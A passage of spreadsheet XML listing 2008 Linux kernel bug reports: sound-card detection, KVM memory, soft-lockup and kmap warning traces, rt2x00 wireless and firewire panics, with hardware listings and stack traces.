0 0000060 ? t 343 G \0 \0 \0 \0 236 \t \0 \0 \0 \0 \0 \0 63 116 227 71 0 0 0 0 158 9 0 0 0 0 0 0 0000100 001 \0 356 \0 001 \0 \0 \0 ? t 343 G \0 \0 \0 \0 1 0 238 0 1 0 0 0 63 116 227 71 0 0 0 0 0000120 251 \t \0 \0 \0 \0 \0 \0 001 \0 356 \0 \0 \0 \0 \0 169 9 0 0 0 0 0 0 1 0 238 0 0 0 0 0 0000140 @ t 343 G \0 \0 \0 \0 236 \t \0 \0 \0 \0 \0 \0 64 116 227 71 0 0 0 0 158 9 0 0 0 0 0 0 0000160 001 \0 356 \0 001 \0 \0 \0 @ t 343 G \0 \0 \0 \0 1 0 238 0 1 0 0 0 64 116 227 71 0 0 0 0 0000200 251 \t \0 \0 \0 \0 \0 \0 001 \0 356 \0 \0 \0 \0 \0 169 9 0 0 0 0 0 0 1 0 238 0 0 0 0 0 0000220 A t 343 G \0 \0 \0 \0 240 \t \0 \0 \0 \0 \0 \0 65 116 227 71 0 0 0 0 160 9 0 0 0 0 0 0 0000240 001 \0 356 \0 001 \0 \0 \0 A t 343 G \0 \0 \0 \0 1 0 238 0 1 0 0 0 65 116 227 71 0 0 0 0 0000260 253 \t \0 \0 \0 \0 \0 \0 001 \0 356 \0 \0 \0 \0 \0 171 9 0 0 0 0 0 0 1 0 238 0 0 0 0 0 0000300 B t 343 G \0 \0 \0 \0 241 \t \0 \0 \0 \0 \0 \0 66 116 227 71 0 0 0 0 161 9 0 0 0 0 0 0 0000320 001 \0 356 \0 001 \0 \0 \0 B t 343 G \0 \0 \0 \0 1 0 238 0 1 0 0 0 66 116 227 71 0 0 0 0 0000340 254 \t \0 \0 \0 \0 \0 \0 001 \0 356 \0 \0 \0 \0 \0 172 9 0 0 0 0 0 0 1 0 238 0 0 0 0 0 0000360 C t 343 G \0 \0 \0 \0 236 \t \0 \0 \0 \0 \0 \0 67 116 227 71 0 0 0 0 158 9 0 0 0 0 0 0 0000400 001 \0 356 \0 001 \0 \0 \0 C t 343 G \0 \0 \0 \0 1 0 238 0 1 0 0 0 67 116 227 71 0 0 0 0 0000420 250 \t \0 \0 \0 \0 \0 \0 001 \0 356 \0 \0 \0 \0 \0 168 9 0 0 0 0 0 0 1 0 238 0 0 0 0 0 I hope there is enough structure and repetition in this output to allow you to find the source. I didn't bother to bisect to find the cause of the ^@'s on my console, since I don't think it's the underlying problem. Thanks, Bruce</t>
  </si>
  <si>
    <t>Sound card not recognized correctly, FSC Amilo Pi 2515.</t>
  </si>
  <si>
    <t>2.6.25-r6</t>
  </si>
  <si>
    <t>2008-03-21 05:57 UTC</t>
  </si>
  <si>
    <t>2008-08-01 12:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 2007.0 Hardware Environment: amd64 Problem Description: ALC883-based hda-intel sound card is not detected correctly - wrong channels and speakers not muted upon headphone plug-in. This issue has been adressed here: https://bugtrack.alsa-project.org/alsa-bug/view.php?id=3800 Steps to reproduce: always</t>
  </si>
  <si>
    <t>volume wheel does not work in 2.6.25-rc6</t>
  </si>
  <si>
    <t>2.6.27-rc8</t>
  </si>
  <si>
    <t>2008-03-21 11:42 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.24.2 Earliest failing kernel version:unknown Distribution:ubuntu 7.10 Hardware Environment:toshiba laptop U305, sound hda-intel, realtek 268 codec Software Environment: Problem Description: Volume wheel events in 2.6.24 started to be handled by ACPI directly (no events to the S.O., I have a toshiba OSD appers when using it). Now it seems that there is no agreement bewteen alsa and the ACPI control. Moving the wheel changes PCM volume (not master), sometime the two channels (left-right), sometime just one channel, sometime none, and each time in a seemingly random way. Steps to reproduce: move the volume wheel. I marked this low priorty because I use it very rarely (and if I only could map it to the mouse events 5 an 6 t would be much more useful than to control the volume). acpidump, alsa info, etc are available at http://www.dea.icai.upcomillas.es/romano/linux/info/</t>
  </si>
  <si>
    <t>2.6.25-git regression with snd-hda-intel on Dell XPS M1330, no analog sound</t>
  </si>
  <si>
    <t>commit 2f32d909f3a85a96074801f6cf20f93324f87646</t>
  </si>
  <si>
    <t>2008-03-21 17:49 UTC</t>
  </si>
  <si>
    <t>2008-09-23 04:13 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-git regression with snd-hda-intel on Dell XPS M1330, no analog sound Submitter : Andre Tomt &lt;andre@tomt.net&gt; Date : 2008-03-21 20:03 References : http://lkml.org/lkml/2008/3/21/295 Handled-By : Matthew Ranostay &lt;mranostay@embeddedalley.com&gt; This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[BUG] oopses in different processes since 2.6.25-rc5-git4</t>
  </si>
  <si>
    <t>2008-03-21 17:53 UTC</t>
  </si>
  <si>
    <t>2008-03-28 07:16 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] oopses in different processes since 2.6.25-rc5-git4 Submitter : Markus Rehbach &lt;markus.rehbach@gmx.de&gt; Date : 2008-03-32 17:18 References : http://lkml.org/lkml/2008/3/21/202 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc5-git5 KVM memory not freed</t>
  </si>
  <si>
    <t>2.6.25-rc5-git5</t>
  </si>
  <si>
    <t>2008-03-21 18:16 UTC</t>
  </si>
  <si>
    <t>2008-03-27 16:03 UTC</t>
  </si>
  <si>
    <t>virtualization_kvm</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc5-git5 KVM memory not freed Submitter : "Ioan Ionita" &lt;opslynx@gmail.com&gt; Date : 2008-03-20 18:41 References : http://lkml.org/lkml/2008/3/20/136 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-rc6: kernel BUG at fs/sysfs/file.c:89</t>
  </si>
  <si>
    <t>2008-03-21 18:25 UTC</t>
  </si>
  <si>
    <t>2008-04-02 05:08 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-rc6: kernel BUG at fs/sysfs/file.c:89 Submitter : Christian Kujau &lt;lists@nerdbynature.de&gt; Date : 2008-03-21 23:35 References : http://lkml.org/lkml/2008/3/21/408 This entry is being used for tracking a regression from 2.6.24. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: soft lockup - CPU#0 stuck</t>
  </si>
  <si>
    <t>2008-03-22 06:53 UTC</t>
  </si>
  <si>
    <t>2010-01-19 17:02 UTC</t>
  </si>
  <si>
    <t>Earliest failing kernel version: 2.6.24.3 Distribution: Debian 4.0/Etch Sparc64 Hardware Environment: Sparc64 Problem Description: During boot of my Sparc64 with a vanille 2.6.24.3 kernel the kernel gets stuck. After while it continues allowing normal use of the machine. The message shown in the kernel logs looks like this: BUG: soft lockup - CPU#0 stuck for 11s! [ifconfig:2408] TSTATE: 0000004480009603 TPC: 0000000010013390 TNPC: 0000000010013394 Y: 00000000 Not tainted TPC: &lt;gem_interrupt+0x14/0xec [sungem]&gt; g0: 0000000000009000 g1: 0800000000000001 g2: 0000000000000100 g3: 0000000000000400 g4: fffff8003e61c060 g5: 0000000000000020 g6: fffff8003e7e8000 g7: 0000000000000000 o0: 0000000000000001 o1: fffff8003d090670 o2: 0000000000000001 o3: 000001fe0000f078 o4: 7fffffffffffffff o5: 0000000080000000 sp: fffff8003e7ea341 ret_pc: 00000000100133bc RPC: &lt;gem_interrupt+0x40/0xec [sungem]&gt; l0: fffff8003d090670 l1: 0000000000821400 l2: fffff8003e7eaca0 l3: 0000000000000400 l4: 0000000000000000 l5: 0000000000000005 l6: 0000000000000000 l7: 0000000000000008 i0: 0000000000000009 i1: fffff8003d090620 i2: 000000001c2245fa i3: 000000000000000c i4: 7fffffffffffffff i5: 0000000000000000 i6: fffff8003e7ea401 i7: 000000000047e974 I7: &lt;handle_IRQ_event+0x34/0x74&gt; It appartently has to do with the network (ifconfig) although I'm not 100%. I tried changing several settings in the kernel (to many to write down here) but all give the same result. Steps to reproduce: - Build a 2.6.24.3 for Sparc64 - Boot a SUN Sparc64 machine with this kernel - System gets stuck during boot but after a while it continues its boot.</t>
  </si>
  <si>
    <t>firewire: panic in ohci_cancel_packet</t>
  </si>
  <si>
    <t>2.6.25-rc6 + firewire development patches</t>
  </si>
  <si>
    <t>2008-03-24 12:06 UTC</t>
  </si>
  <si>
    <t>2008-07-29 16:18 UTC</t>
  </si>
  <si>
    <t>hard to reproduce panic: - plugged in two bus powered hubs into PC - got panic in ohci_cancel_packet, called by fw_flush_transactions, called by fw_core_handle_bus_reset, while or right after handle_ar_packet screenshot follows</t>
  </si>
  <si>
    <t>WARNING: at arch/x86/mm/highmem_32.c:43 kmap_atomic_prot+0x87/0x184()</t>
  </si>
  <si>
    <t>2.6.25-rc6-git7</t>
  </si>
  <si>
    <t>2008-03-25 02:50 UTC</t>
  </si>
  <si>
    <t>2008-03-28 15:01 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Distribution: gentoo Hardware Environment: lspci 00:00.0 Host bridge: Intel Corporation Server DRAM Controller 00:01.0 PCI bridge: Intel Corporation Server Host-Primary PCI Express Bridge 00:19.0 Ethernet controller: Intel Corporation 82566DM-2 Gigabit Network Connection (rev 02) 00:1a.0 USB Controller: Intel Corporation USB UHCI Controller #4 (rev 02) 00:1a.1 USB Controller: Intel Corporation USB UHCI Controller #5 (rev 02) 00:1a.2 USB Controller: Intel Corporation USB UHCI Controller #6 (rev 02) 00:1a.7 USB Controller: Intel Corporation USB2 EHCI Controller #2 (rev 02) 00:1c.0 PCI bridge: Intel Corporation PCI Express Port 1 (rev 02) 00:1c.4 PCI bridge: Intel Corporation PCI Express Port 5 (rev 02) 00:1d.0 USB Controller: Intel Corporation USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation USB UHCI Controller #3 (rev 02) 00:1d.7 USB Controller: Intel Corporation USB2 EHCI Controller #1 (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 92) 00:1f.0 ISA bridge: Intel Corporation LPC Interface Controller (rev 02) 00:1f.2 SATA controller: Intel Corporation 6 port SATA AHCI Controller (rev 02) 00:1f.3 SMBus: Intel Corporation SMBus Controller (rev 02) 01:00.0 Ethernet controller: Intel Corporation 82572EI Gigabit Ethernet Controller (Copper) (rev 06) 03:00.0 VGA compatible controller: Matrox Graphics, Inc. MGA G200e [Pilot] ServerEngines (SEP1) (rev 02) 04:02.0 Ethernet controller: Intel Corporation 82541GI Gigabit Ethernet Controller (rev 05) cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 15 model name : Intel(R) Xeon(R) CPU 3075 @ 2.66GHz stepping : 11 cpu MHz : 2660.095 cache size : 4096 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr lahf_lm bogomips : 5324.11 clflush size : 64 processor : 1 vendor_id : GenuineIntel cpu family : 6 model : 15 model name : Intel(R) Xeon(R) CPU 3075 @ 2.66GHz stepping : 11 cpu MHz : 2660.095 cache size : 4096 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr lahf_lm bogomips : 5320.37 clflush size : 64 cat /proc/meminfo MemTotal: 2068148 kB MemFree: 1432804 kB Buffers: 203020 kB Cached: 253120 kB SwapCached: 0 kB Active: 204576 kB Inactive: 263872 kB HighTotal: 1177008 kB HighFree: 908920 kB LowTotal: 891140 kB LowFree: 523884 kB SwapTotal: 995896 kB SwapFree: 995896 kB Dirty: 1724 kB Writeback: 0 kB AnonPages: 12308 kB Mapped: 5072 kB Slab: 158532 kB SReclaimable: 74692 kB SUnreclaim: 83840 kB PageTables: 260 kB NFS_Unstable: 0 kB Bounce: 0 kB CommitLimit: 2029968 kB Committed_AS: 20436 kB VmallocTotal: 110584 kB VmallocUsed: 1876 kB VmallocChunk: 108612 kB HugePages_Total: 0 HugePages_Free: 0 HugePages_Rsvd: 0 HugePages_Surp: 0 Hugepagesize: 4096 kB Software Environment: bgp/quagga Problem Description: Pid: 0, comm: swapper Not tainted 2.6.25-rc6-git7 #1 [&lt;c021a0bf&gt;] warn_on_slowpath+0x40/0x4f [&lt;c043c372&gt;] fn_trie_lookup+0xe3/0x288 [&lt;c043d61a&gt;] fib4_rule_action+0x3d/0x4d [&lt;c03f6417&gt;] fib_rules_lookup+0x71/0xb6 [&lt;c043d652&gt;] fib_lookup+0x28/0x36 [&lt;c023f126&gt;] __rmqueue_smallest+0x83/0xe1 [&lt;c023f197&gt;] __rmqueue+0x13/0x172 [&lt;c0211806&gt;] kmap_atomic_prot+0x87/0x184 [&lt;c023fe7c&gt;] get_page_from_freelist+0x2c5/0x358 [&lt;c023ff92&gt;] __alloc_pages+0x71/0x2cf [&lt;c0240229&gt;] __get_free_pages+0x39/0x47 [&lt;c03f10d0&gt;] neigh_create+0x2d8/0x40e [&lt;c045b85b&gt;] _read_unlock_bh+0x5/0xd [&lt;c03f0539&gt;] neigh_lookup+0x92/0x9b [&lt;c03f1241&gt;] neigh_event_ns+0x3b/0x70 [&lt;c0432523&gt;] arp_process+0x1e5/0x534 [&lt;c03edd5a&gt;] dev_queue_xmit+0x279/0x29f [&lt;c0419415&gt;] ip_finish_output+0x1c6/0x1fc [&lt;c03f81d5&gt;] tc_classify+0x14/0x6b [&lt;c03eb578&gt;] netif_receive_skb+0x29f/0x30e [&lt;c0357e63&gt;] e1000_receive_skb+0x132/0x14c [&lt;c0359ecf&gt;] e1000_clean_rx_irq+0x1fa/0x29c [&lt;c0356f82&gt;] e1000_clean+0x29f/0x427 [&lt;c03ed3ee&gt;] net_rx_action+0x5c/0x14a [&lt;c021e25e&gt;] __do_softirq+0x5d/0xc1 [&lt;c021e2f4&gt;] do_softirq+0x32/0x36 [&lt;c021e585&gt;] irq_exit+0x35/0x67 [&lt;c0204f79&gt;] do_IRQ+0x73/0x82 [&lt;c020343b&gt;] common_interrupt+0x23/0x28 [&lt;c0201377&gt;] mwait_idle_with_hints+0x36/0x39 [&lt;c020137a&gt;] mwait_idle+0x0/0xa [&lt;c0201817&gt;] cpu_idle+0xa8/0xc8 ======================= ---[ end trace 6a93a9703f6a626e ]--- ------------[ cut here ]------------ WARNING: at arch/x86/mm/highmem_32.c:43 kmap_atomic_prot+0x87/0x184() Modules linked in: Pid: 0, comm: swapper Not tainted 2.6.25-rc6-git7 #1 [&lt;c021a0bf&gt;] warn_on_slowpath+0x40/0x4f [&lt;c043c372&gt;] fn_trie_lookup+0xe3/0x288 [&lt;c043d61a&gt;] fib4_rule_action+0x3d/0x4d [&lt;c03f6417&gt;] fib_rules_lookup+0x71/0xb6 [&lt;c043d652&gt;] fib_lookup+0x28/0x36 [&lt;c023f126&gt;] __rmqueue_smallest+0x83/0xe1 [&lt;c023f197&gt;] __rmqueue+0x13/0x172 [&lt;c0211806&gt;] kmap_atomic_prot+0x87/0x184 [&lt;c023fe7c&gt;] get_page_from_freelist+0x2c5/0x358 [&lt;c023ff92&gt;] __alloc_pages+0x71/0x2cf [&lt;c0240229&gt;] __get_free_pages+0x39/0x47 [&lt;c03f10d0&gt;] neigh_create+0x2d8/0x40e [&lt;c045b85b&gt;] _read_unlock_bh+0x5/0xd [&lt;c03f0539&gt;] neigh_lookup+0x92/0x9b [&lt;c03f1241&gt;] neigh_event_ns+0x3b/0x70 [&lt;c0432523&gt;] arp_process+0x1e5/0x534 [&lt;c03edd5a&gt;] dev_queue_xmit+0x279/0x29f [&lt;c0419415&gt;] ip_finish_output+0x1c6/0x1fc [&lt;c03f81d5&gt;] tc_classify+0x14/0x6b [&lt;c03eb578&gt;] netif_receive_skb+0x29f/0x30e [&lt;c0357e63&gt;] e1000_receive_skb+0x132/0x14c [&lt;c0359ecf&gt;] e1000_clean_rx_irq+0x1fa/0x29c [&lt;c0356f82&gt;] e1000_clean+0x29f/0x427 [&lt;c03ed3ee&gt;] net_rx_action+0x5c/0x14a [&lt;c021e25e&gt;] __do_softirq+0x5d/0xc1 [&lt;c021e2f4&gt;] do_softirq+0x32/0x36 [&lt;c021e585&gt;] irq_exit+0x35/0x67 [&lt;c0204f79&gt;] do_IRQ+0x73/0x82 [&lt;c020343b&gt;] common_interrupt+0x23/0x28 [&lt;c0201377&gt;] mwait_idle_with_hints+0x36/0x39 [&lt;c020137a&gt;] mwait_idle+0x0/0xa [&lt;c0201817&gt;] cpu_idle+0xa8/0xc8 ======================= ---[ end trace 6a93a9703f6a626e ]--- ------------[ cut here ]------------ WARNING: at arch/x86/mm/highmem_32.c:43 kmap_atomic_prot+0x87/0x184() Modules linked in: Pid: 0, comm: swapper Not tainted 2.6.25-rc6-git7 #1 [&lt;c021a0bf&gt;] warn_on_slowpath+0x40/0x4f [&lt;c022ff00&gt;] clockevents_program_event+0x2e/0xd2 [&lt;c022ee6d&gt;] clocksource_get_next+0x39/0x3f [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022ee6d&gt;] clocksource_get_next+0x39/0x3f [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022d8b8&gt;] getnstimeofday+0x2b/0xb2 [&lt;c022ff96&gt;] clockevents_program_event+0xc4/0xd2 [&lt;c023f126&gt;] __rmqueue_smallest+0x83/0xe1 [&lt;c023f197&gt;] __rmqueue+0x13/0x172 [&lt;c0211806&gt;] kmap_atomic_prot+0x87/0x184 [&lt;c023fe7c&gt;] get_page_from_freelist+0x2c5/0x358 [&lt;c023ff92&gt;] __alloc_pages+0x71/0x2cf [&lt;c043d61a&gt;] fib4_rule_action+0x3d/0x4d [&lt;c0240229&gt;] __get_free_pages+0x39/0x47 [&lt;c03f10d0&gt;] neigh_create+0x2d8/0x40e [&lt;c045b85b&gt;] _read_unlock_bh+0x5/0xd [&lt;c03f0539&gt;] neigh_lookup+0x92/0x9b [&lt;c04319f3&gt;] arp_bind_neighbour+0x53/0x64 [&lt;c0413343&gt;] rt_intern_hash+0x257/0x32d [&lt;c0414406&gt;] ip_route_input+0x812/0xbc6 [&lt;c0415c16&gt;] ip_rcv_finish+0x2a/0x293 [&lt;c03eb578&gt;] netif_receive_skb+0x29f/0x30e [&lt;c0357e63&gt;] e1000_receive_skb+0x132/0x14c [&lt;c0359ecf&gt;] e1000_clean_rx_irq+0x1fa/0x29c [&lt;c0356f82&gt;] e1000_clean+0x29f/0x427 [&lt;c022c395&gt;] ktime_get_ts+0x11/0x3a [&lt;c03ed3ee&gt;] net_rx_action+0x5c/0x14a [&lt;c021e25e&gt;] __do_softirq+0x5d/0xc1 [&lt;c021e2f4&gt;] do_softirq+0x32/0x36 [&lt;c021e585&gt;] irq_exit+0x35/0x67 [&lt;c0204f79&gt;] do_IRQ+0x73/0x82 [&lt;c020343b&gt;] common_interrupt+0x23/0x28 [&lt;c0201377&gt;] mwait_idle_with_hints+0x36/0x39 [&lt;c020137a&gt;] mwait_idle+0x0/0xa [&lt;c0201817&gt;] cpu_idle+0xa8/0xc8 ======================= ---[ end trace 6a93a9703f6a626e ]--- ------------[ cut here ]------------ WARNING: at arch/x86/mm/highmem_32.c:43 kmap_atomic_prot+0x87/0x184() Modules linked in: Pid: 0, comm: swapper Not tainted 2.6.25-rc6-git7 #1 [&lt;c021a0bf&gt;] warn_on_slowpath+0x40/0x4f [&lt;c022ff00&gt;] clockevents_program_event+0x2e/0xd2 [&lt;c022ee6d&gt;] clocksource_get_next+0x39/0x3f [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022ee6d&gt;] clocksource_get_next+0x39/0x3f [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022d8b8&gt;] getnstimeofday+0x2b/0xb2 [&lt;c022ff96&gt;] clockevents_program_event+0xc4/0xd2 [&lt;c023f126&gt;] __rmqueue_smallest+0x83/0xe1 [&lt;c023f197&gt;] __rmqueue+0x13/0x172 [&lt;c0211806&gt;] kmap_atomic_prot+0x87/0x184 [&lt;c023fe7c&gt;] get_page_from_freelist+0x2c5/0x358 [&lt;c023ff92&gt;] __alloc_pages+0x71/0x2cf [&lt;c043d61a&gt;] fib4_rule_action+0x3d/0x4d [&lt;c0240229&gt;] __get_free_pages+0x39/0x47 [&lt;c03f10d0&gt;] neigh_create+0x2d8/0x40e [&lt;c045b85b&gt;] _read_unlock_bh+0x5/0xd [&lt;c03f0539&gt;] neigh_lookup+0x92/0x9b [&lt;c04319f3&gt;] arp_bind_neighbour+0x53/0x64 [&lt;c0413343&gt;] rt_intern_hash+0x257/0x32d [&lt;c0414406&gt;] ip_route_input+0x812/0xbc6 [&lt;c0415c16&gt;] ip_rcv_finish+0x2a/0x293 [&lt;c03eb578&gt;] netif_receive_skb+0x29f/0x30e [&lt;c0357e63&gt;] e1000_receive_skb+0x132/0x14c [&lt;c0359ecf&gt;] e1000_clean_rx_irq+0x1fa/0x29c [&lt;c0356f82&gt;] e1000_clean+0x29f/0x427 [&lt;c022c395&gt;] ktime_get_ts+0x11/0x3a [&lt;c03ed3ee&gt;] net_rx_action+0x5c/0x14a [&lt;c021e25e&gt;] __do_softirq+0x5d/0xc1 [&lt;c021e2f4&gt;] do_softirq+0x32/0x36 [&lt;c021e585&gt;] irq_exit+0x35/0x67 [&lt;c0204f79&gt;] do_IRQ+0x73/0x82 [&lt;c020343b&gt;] common_interrupt+0x23/0x28 [&lt;c0201377&gt;] mwait_idle_with_hints+0x36/0x39 [&lt;c020137a&gt;] mwait_idle+0x0/0xa [&lt;c0201817&gt;] cpu_idle+0xa8/0xc8 ======================= ---[ end trace 6a93a9703f6a626e ]--- ------------[ cut here ]------------ WARNING: at arch/x86/mm/highmem_32.c:43 kmap_atomic_prot+0x87/0x184() Modules linked in: Pid: 0, comm: swapper Not tainted 2.6.25-rc6-git7 #1 [&lt;c021a0bf&gt;] warn_on_slowpath+0x40/0x4f [&lt;c022ff00&gt;] clockevents_program_event+0x2e/0xd2 [&lt;c022ee6d&gt;] clocksource_get_next+0x39/0x3f [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022ee6d&gt;] clocksource_get_next+0x39/0x3f [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022d8b8&gt;] getnstimeofday+0x2b/0xb2 [&lt;c022ff96&gt;] clockevents_program_event+0xc4/0xd2 [&lt;c023f126&gt;] __rmqueue_smallest+0x83/0xe1 [&lt;c023f197&gt;] __rmqueue+0x13/0x172 [&lt;c0211806&gt;] kmap_atomic_prot+0x87/0x184 [&lt;c023fe7c&gt;] get_page_from_freelist+0x2c5/0x358 [&lt;c023ff92&gt;] __alloc_pages+0x71/0x2cf [&lt;c043d61a&gt;] fib4_rule_action+0x3d/0x4d [&lt;c0240229&gt;] __get_free_pages+0x39/0x47 [&lt;c03f10d0&gt;] neigh_create+0x2d8/0x40e [&lt;c045b85b&gt;] _read_unlock_bh+0x5/0xd [&lt;c03f0539&gt;] neigh_lookup+0x92/0x9b [&lt;c04319f3&gt;] arp_bind_neighbour+0x53/0x64 [&lt;c0413343&gt;] rt_intern_hash+0x257/0x32d [&lt;c0414406&gt;] ip_route_input+0x812/0xbc6 [&lt;c0415c16&gt;] ip_rcv_finish+0x2a/0x293 [&lt;c03eb578&gt;] netif_receive_skb+0x29f/0x30e [&lt;c0357e63&gt;] e1000_receive_skb+0x132/0x14c [&lt;c0359ecf&gt;] e1000_clean_rx_irq+0x1fa/0x29c [&lt;c0356f82&gt;] e1000_clean+0x29f/0x427 [&lt;c022c395&gt;] ktime_get_ts+0x11/0x3a [&lt;c03ed3ee&gt;] net_rx_action+0x5c/0x14a [&lt;c021e25e&gt;] __do_softirq+0x5d/0xc1 [&lt;c021e2f4&gt;] do_softirq+0x32/0x36 [&lt;c021e585&gt;] irq_exit+0x35/0x67 [&lt;c0204f79&gt;] do_IRQ+0x73/0x82 [&lt;c020343b&gt;] common_interrupt+0x23/0x28 [&lt;c0201377&gt;] mwait_idle_with_hints+0x36/0x39 [&lt;c020137a&gt;] mwait_idle+0x0/0xa [&lt;c0201817&gt;] cpu_idle+0xa8/0xc8 ======================= ---[ end trace 6a93a9703f6a626e ]--- ------------[ cut here ]------------ WARNING: at arch/x86/mm/highmem_32.c:43 kmap_atomic_prot+0x87/0x184() Modules linked in: Pid: 0, comm: swapper Not tainted 2.6.25-rc6-git7 #1 [&lt;c021a0bf&gt;] warn_on_slowpath+0x40/0x4f [&lt;c022ff00&gt;] clockevents_program_event+0x2e/0xd2 [&lt;c022ee6d&gt;] clocksource_get_next+0x39/0x3f [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022ee6d&gt;] clocksource_get_next+0x39/0x3f [&lt;c022df23&gt;] update_wall_time+0x552/0x6c7 [&lt;c022d8b8&gt;] getnstimeofday+0x2b/0xb2 [&lt;c022ff96&gt;] clockevents_program_event+0xc4/0xd2 [&lt;c023f126&gt;] __rmqueue_smallest+0x83/0xe1 [&lt;c023f197&gt;] __rmqueue+0x13/0x172 [&lt;c0211806&gt;] kmap_atomic_prot+0x87/0x184 [&lt;c023fe7c&gt;] get_page_from_freelist+0x2c5/0x358 [&lt;c023ff92&gt;] __alloc_pages+0x71/0x2cf [&lt;c043d61a&gt;] fib4_rule_action+0x3d/0x4d [&lt;c0240229&gt;] __get_free_pages+0x39/0x47 [&lt;c03f10d0&gt;] neigh_create+0x2d8/0x40e [&lt;c045b85b&gt;] _read_unlock_bh+0x5/0xd [&lt;c03f0539&gt;] neigh_lookup+0x92/0x9b [&lt;c04319f3&gt;] arp_bind_neighbour+0x53/0x64 [&lt;c0413343&gt;] rt_intern_hash+0x257/0x32d [&lt;c0414406&gt;] ip_route_input+0x812/0xbc6 [&lt;c0415c16&gt;] ip_rcv_finish+0x2a/0x293 [&lt;c03eb578&gt;] netif_receive_skb+0x29f/0x30e [&lt;c0357e63&gt;] e1000_receive_skb+0x132/0x14c [&lt;c0359ecf&gt;] e1000_clean_rx_irq+0x1fa/0x29c [&lt;c0356f82&gt;] e1000_clean+0x29f/0x427 [&lt;c022c395&gt;] ktime_get_ts+0x11/0x3a [&lt;c03ed3ee&gt;] net_rx_action+0x5c/0x14a [&lt;c021e25e&gt;] __do_softirq+0x5d/0xc1 [&lt;c021e2f4&gt;] do_softirq+0x32/0x36 [&lt;c021e585&gt;] irq_exit+0x35/0x67 [&lt;c0204f79&gt;] do_IRQ+0x73/0x82 [&lt;c020343b&gt;] common_interrupt+0x23/0x28 [&lt;c0201377&gt;] mwait_idle_with_hints+0x36/0x39 [&lt;c020137a&gt;] mwait_idle+0x0/0xa [&lt;c0201817&gt;] cpu_idle+0xa8/0xc8 ======================= ---[ end trace 6a93a9703f6a626e ]---</t>
  </si>
  <si>
    <t>rt2x00 does not associate or give scan results</t>
  </si>
  <si>
    <t>2.6.25-rc6, 2.6.25</t>
  </si>
  <si>
    <t>2008-03-25 06:04 UTC</t>
  </si>
  <si>
    <t>2009-03-23 09:30 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Earliest failing kernel version: 2.6.25-rc6 Distribution: Debian testing/unstable Hardware Environment: LG LE50 Express laptop (i386) Software Environment: wpa_supplicant 0.6.3, wireless-tools 29 Problem Description: With 2.6.25-rc6 I can no longer associate with my office access point. I am using WEP with wpa_supplicant. "iwlist scan" is not showing any scan results, or sometimes shows one cell IIRC, but with 2.6.24 I see plenty of networks. Nothing special in the logs: Mar 25 10:48:49 better kernel: phy0 -&gt; rt2x00_set_chip: Info - Chipset detected - rt: 0201, rf: 0003, rev: 00000004. Mar 25 10:48:49 better kernel: phy0 -&gt; rt2x00mac_conf_tx: Info - Configured TX ring 0 - CWmin: 4, CWmax: 10, Aifs: 2. Mar 25 10:48:49 better kernel: phy0 -&gt; rt2x00mac_conf_tx: Info - Configured TX ring 1 - CWmin: 4, CWmax: 10, Aifs: 2. Mar 25 10:48:49 better kernel: phy0 -&gt; rt2x00mac_conf_tx: Info - Configured TX ring 7 - CWmin: 5, CWmax: 10, Aifs: 2.</t>
  </si>
  <si>
    <t>panic using bridging on linus kernel 2.6.25-rc6</t>
  </si>
  <si>
    <t>2008-03-25 11:40 UTC</t>
  </si>
  <si>
    <t>Andy Gospodarek</t>
  </si>
  <si>
    <t>2008-04-15 06:13 UTC</t>
  </si>
  <si>
